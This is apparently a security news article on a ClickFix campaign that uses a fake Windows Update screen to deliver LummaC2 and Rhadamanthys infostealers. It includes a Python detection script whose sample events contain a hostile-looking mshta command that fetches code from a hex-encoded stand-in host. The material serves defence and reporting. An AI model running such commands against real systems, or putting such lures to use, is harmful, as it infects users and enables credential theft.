Threat actors have recently adapted the ClickFix attack model, employing a deceptive tactic that disguises malicious code within a convincing yet fraudulent Windows Update screen. This screen, characterized by its bright blue background and white lettering, mimics the familiar Windows Update interface. According to Huntress security researchers Ben Folland and Anna Pham, this new variant presents a full-screen display that features realistic “Working on updates” animations. Ultimately, it prompts users to follow the standard ClickFix procedure: opening the Run prompt (Win+R) and pasting a malicious command.
Executing this command initiates a series of actions that lead to the installation of LummaC2 and Rhadamanthys info-stealing malware. The ClickFix model, a relatively recent yet increasingly prevalent social engineering scam, tricks victims into executing harmful commands on their systems. This process not only facilitates malware deployment, including ransomware, but also enables cybercriminals to circumvent existing security measures.
Rapid Rise in ClickFix Campaigns
In a report released in June, cybersecurity firm ESET highlighted a significant surge in ClickFix attacks, noting a staggering increase of over 500% compared to the latter half of 2024. This alarming trend has positioned ClickFix as one of the most rapidly escalating threats, accounting for nearly 8% of all blocked attacks in the first half of 2025, making it the second most common attack vector after phishing. Jiří Kropáč, director of ESET’s Threat Prevention Labs, remarked on the expanding list of threats associated with ClickFix, which now includes infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware linked to nation-state actors.
Dropping LummaC2, Rhadamanthys Infostealers
In their investigation, Huntress researchers tracked two ClickFix lures that utilized a steganographic loader to deliver the info-stealing malware, LummaC2 and Rhadamanthys. These steganographic ClickFix scams conceal malicious software within the pixel data of image files, aiming to deceive users into executing harmful commands. One variant employed a human verification page as bait, while the other utilized the Windows Update interface.
Looks Like the Real Thing
Since early October, the researchers have been monitoring several ClickFix clusters that leverage the Windows Update ruse to convince users that a legitimate update cycle is underway. The screen fills the entire display, showcasing a “genuine-looking Windows Update screen” complete with instructions urging users not to turn off their computers during the update process. At the conclusion of this faux update, users are prompted to follow the familiar Win+R & Ctrl+V sequence to paste the malicious command.
The execution chain mirrors that of the human verification variant: it begins with an mshta.exe command whose URL carries a hex-encoded second octet. This launches PowerShell, which dynamically decrypts and loads a reflective .NET assembly; that assembly in turn injects a second .NET assembly responsible for process injection. The shellcode injected into the target process is extracted from an image using steganography.
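The chain above leaves a distinctive parent-child trail in process-creation telemetry. The following is an added detection example, not code from the Huntress report, that flags explorer.exe launching mshta.exe with a remote URL, a dotted IP host containing a hex-encoded octet, and powershell.exe spawned by mshta.exe; the sample events, their field names and the exact URL shape are constructed assumptions.

```python
import re

# Constructed process-creation events (Sysmon event 1 style); field names are assumed.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\winlogon.exe", "command_line": "explorer.exe"},
    # Run box (Win+R) launches mshta with a URL whose second octet is hex (constructed host)
    {"pid": 5208, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "mshta http://203.0x71.113.5/update"},
    {"pid": 5310, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": "powershell.exe -NoProfile -Command <constructed placeholder>"},
    # Benign: a browser launched from explorer with an ordinary URL
    {"pid": 6000, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "firefox.exe https://example.com/"},
]

URL_RE = re.compile(r"https?://([^/\s\"']+)", re.I)
# Dotted-quad host where each part is decimal or 0x-hex (e.g. 203.0x71.113.5)
DOTTED_RE = re.compile(r"^(?:0x[0-9a-f]+|\d+)(?:\.(?:0x[0-9a-f]+|\d+)){3}$", re.I)

def host_has_hex_octet(host):
    """True when a dotted IP-literal host carries at least one 0x-encoded octet."""
    host = host.split(":")[0]  # drop any port
    if not DOTTED_RE.match(host):
        return False
    return any(part.lower().startswith("0x") for part in host.split("."))

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def analyze(events):
    """Return (pid, reason) findings for the chain explorer -> mshta <URL> -> powershell."""
    findings = []
    for e in events:
        name, parent = basename(e["image"]), basename(e["parent_image"])
        if name == "mshta.exe" and parent == "explorer.exe":
            m = URL_RE.search(e["command_line"])
            if m:
                findings.append((e["pid"], "mshta.exe launched from explorer.exe with a remote URL"))
                if host_has_hex_octet(m.group(1)):
                    findings.append((e["pid"], "URL host contains a hex-encoded octet"))
        if name == "powershell.exe" and parent == "mshta.exe":
            findings.append((e["pid"], "powershell.exe spawned by mshta.exe"))
    return findings

if __name__ == "__main__":
    for pid, reason in analyze(SAMPLE_EVENTS):
        print(pid, reason)
```

The benign browser launch from explorer.exe produces no finding, which is the false-positive case a rule on "explorer.exe spawns a child with a URL" alone would miss.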
Finding the Payloads
The infostealer malware is extracted from the image and packaged with the Donut shellcode generator, which enables in-memory execution of VBScript, JScript, EXE, DLL files, and .NET assemblies. Using a donut-decryptor tool, the researchers identified the malicious payloads as the LummaC2 and Rhadamanthys infostealers. Earlier this month, European law enforcement agencies dismantled the infrastructure used by threat actors to deploy various malware families, including Rhadamanthys, as part of the ongoing international Operation Endgame. Folland and Pham noted that their research was conducted both before and after this law enforcement action, and that Rhadamanthys is no longer being distributed through the fraudulent Windows Update campaign.
While the use of steganography enhances the ability of these payloads to evade signature-based detection and complicates analysis, the attacks fundamentally rely on a straightforward delivery mechanism: the victim manually opening the Windows Run box to paste a malicious command.